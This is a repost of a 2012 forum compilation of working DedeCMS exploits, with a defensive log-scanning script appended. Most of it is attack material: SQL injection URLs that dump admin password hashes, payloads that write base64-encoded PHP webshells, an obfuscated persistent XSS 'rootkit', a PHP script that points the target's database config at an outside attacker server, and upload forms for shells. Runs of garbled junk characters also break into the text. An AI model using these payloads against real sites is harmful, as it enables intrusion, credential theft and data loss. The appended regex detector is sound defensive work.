DedeCMS vulnerability roundup

Posted on 2012-10-18 10:42:14

DedeCMS 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register as a member and upload a piece of software; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After it is published, viewing or editing it executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell written directly.

Dede 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage parameter XSS vulnerability

1. Copy and paste the URL below into the browser; visiting it triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers intercept URL-based XSS, so the XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. From then on, no matter how any of the URLs below is visited, our XSS is triggered.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable overwrite getshell

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp  = Getshell($url, $aid, $path);
if (strpos($exp, "OK") > 12) {
    echo "\nExploit Success \n";
    if ($aid == 1) echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "\nShell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "\nShell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "\nExploit Failed \n";
}

function Getshell($url, $aid, $path)
{
    $id   = $aid;
    $host = $url;
    $port = "80";
    // Form body: the doaction URL plus _COOKIE[GLOBALS][cfg_*] overrides that redirect the target's database config.
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    // Raw HTTP POST request to /plus/mytag_js.php, assembled by hand and sent over a socket.
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
    }
    fwrite($ock, $data);
    // Only the first response line is read and returned.
    while (!feof($ock)) {
        $exp = fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.

The precondition for this vulnerability is that the backend path must be obtained first.

DedeCMS (织梦) tag remote file write vulnerability

Precondition: prepare your own dede database, then insert this row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the mechanism yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability
1. Register a user, enter the member center, publish an article and upload an image; then, in attachment management, replace the image with our carefully crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (prepend gif89a if the image format is restricted):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(this is the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports the edit succeeded, we have successfully changed the template path.

3. Visit the edited article. Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DedeCMS site management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}

Save this as 1.gif.
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">更改</button>
</form>

Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif.
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option>
</select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

DedeCMS (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, leaving a 20-character MD5 hash; to get the 16-character MD5 from that, remove 3 more characters from the front and 1 from the end.

& @% ~3 _2 m8 H5 R, o/ L/ T! _+ |, [; \% i! K/ @

' G% H6 P2 C+ Y0 p; {1 v% Z5 J
2 d0 X5 T$ X& ~  |# Q
% M' e& G# i# J) K+ ]/ y
0 r& I6 p. G/ m! O. d: {+ g% S% K, n

" H4 X, g& ?3 A) A, M
6 l) ~5 {' C) Q) `+ }$ d1 y5 [7 X0 U/ w7 q  Z3 S
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞+ I+ [  ^8 b; q6 M& _
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action="http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php" method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
This exploits a MySQL numeric field overflow that raises an error, combined with DedeCMS recording database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message can be seen.

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
( A. e  e4 G) d3 v2 B7 lint(3) Error: Illegal double '1024e1024' value found during parsing2 e) G/ M/ n% E' s( s6 `) Y) j# ]
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>; ~5 u# e4 n, z6 c% J+ ]+ B

3. Run the file test.html from dede.rar; note that the address in the form's action is

<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After pressing OK, seeing the message from step 2 means the trojan file was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
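
As an added defensive example (not part of the original post, and not DedeCMS code): the request patterns catalogued above can be matched against a web server access log after the fact. The script below parses combined-format log lines, percent-decodes the request target (twice, so double-encoded payloads normalise) and reports which of the catalogued signatures fired: the `_Cs[` parameter on plus/rss.php, the raw `sql=` parameter on plus/advancedsearch.php, the `_POST[GLOBALS][cfg_*]` / `_COOKIE[GLOBALS][cfg_*]` variable overwrite, `gotopage=` carrying a script tag, the `oldface=` traversal on member/edit_face.php, the `code=` traversal on plus/carbuyaction.php, and UNION SELECT in feedback_js.php / infosearch.php. The log lines, client addresses and timestamps are constructed for the example. POST bodies, which the mytag_js.php form uses to carry the GLOBALS overrides, are not present in access logs, so that variant needs request-body logging or a WAF rather than this scanner.

```python
import re
from urllib.parse import unquote

# Detection rules derived from the request patterns catalogued in this post.
# Each rule is (label, regex) and is applied to the percent-decoded request target.
RULES = [
    ("GLOBALS variable overwrite (cfg_* via _COOKIE/_POST/_GET)",
     re.compile(r"_(?:COOKIE|POST|GET)\[GLOBALS\]\[cfg_", re.I)),
    ("rss.php _Cs[] SQL injection",
     re.compile(r"/plus/rss\.php\?.*_Cs\[", re.I)),
    ("advancedsearch.php raw sql= parameter",
     re.compile(r"/plus/advancedsearch\.php\?.*\bsql=", re.I)),
    ("login.php gotopage script injection",
     re.compile(r"gotopage=[^&]*<script", re.I)),
    ("edit_face.php path-traversal delete",
     re.compile(r"/member/edit_face\.php\?.*oldface=[^&]*\.\./", re.I)),
    ("carbuyaction.php local file inclusion",
     re.compile(r"/plus/carbuyaction\.php\?.*code=[^&]*\.\./", re.I)),
    ("feedback_js.php / infosearch.php UNION injection",
     re.compile(r"/plus/(?:feedback_js|infosearch)\.php\?.*\bunion\s+select\b", re.I)),
]

# Apache/nginx combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_target(target, rounds=2):
    """Percent-decode up to `rounds` times so double-encoded payloads (%2527 -> %27 -> ') normalise."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_line(line):
    """Return a finding dict for one log line, or None if it does not parse or matches no rule."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    rules = [label for label, rx in RULES if rx.search(target)]
    if not rules:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "status": int(m.group("status")),
        "target": target,
        "rules": rules,
    }


def scan_log(lines):
    """Scan an iterable of log lines and return the list of findings in input order."""
    return [f for f in (scan_line(line) for line in lines) if f]


# Constructed sample log lines (RFC 5737 documentation addresses); payload shapes follow the post.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml(1,1,1)%23][0]=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [18/Oct/2012:10:43:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` HTTP/1.1" 200 2048',
    '203.0.113.9 - - [18/Oct/2012:10:45:30 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=192.0.2.10 HTTP/1.1" 302 0',
    '198.51.100.7 - - [18/Oct/2012:10:46:11 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024',
    '198.51.100.7 - - [18/Oct/2012:10:47:00 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 64',
    '192.0.2.44 - - [18/Oct/2012:10:48:00 +0800] "GET /plus/list.php?tid=1 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["time"], finding["rules"], finding["target"][:80])
```

Each rule is anchored to the script path it belongs to, so a harmless `sql=` parameter on an unrelated page does not fire; the status code is kept in the finding because a 200 or 302 on one of these requests is what separates a probe from a likely success.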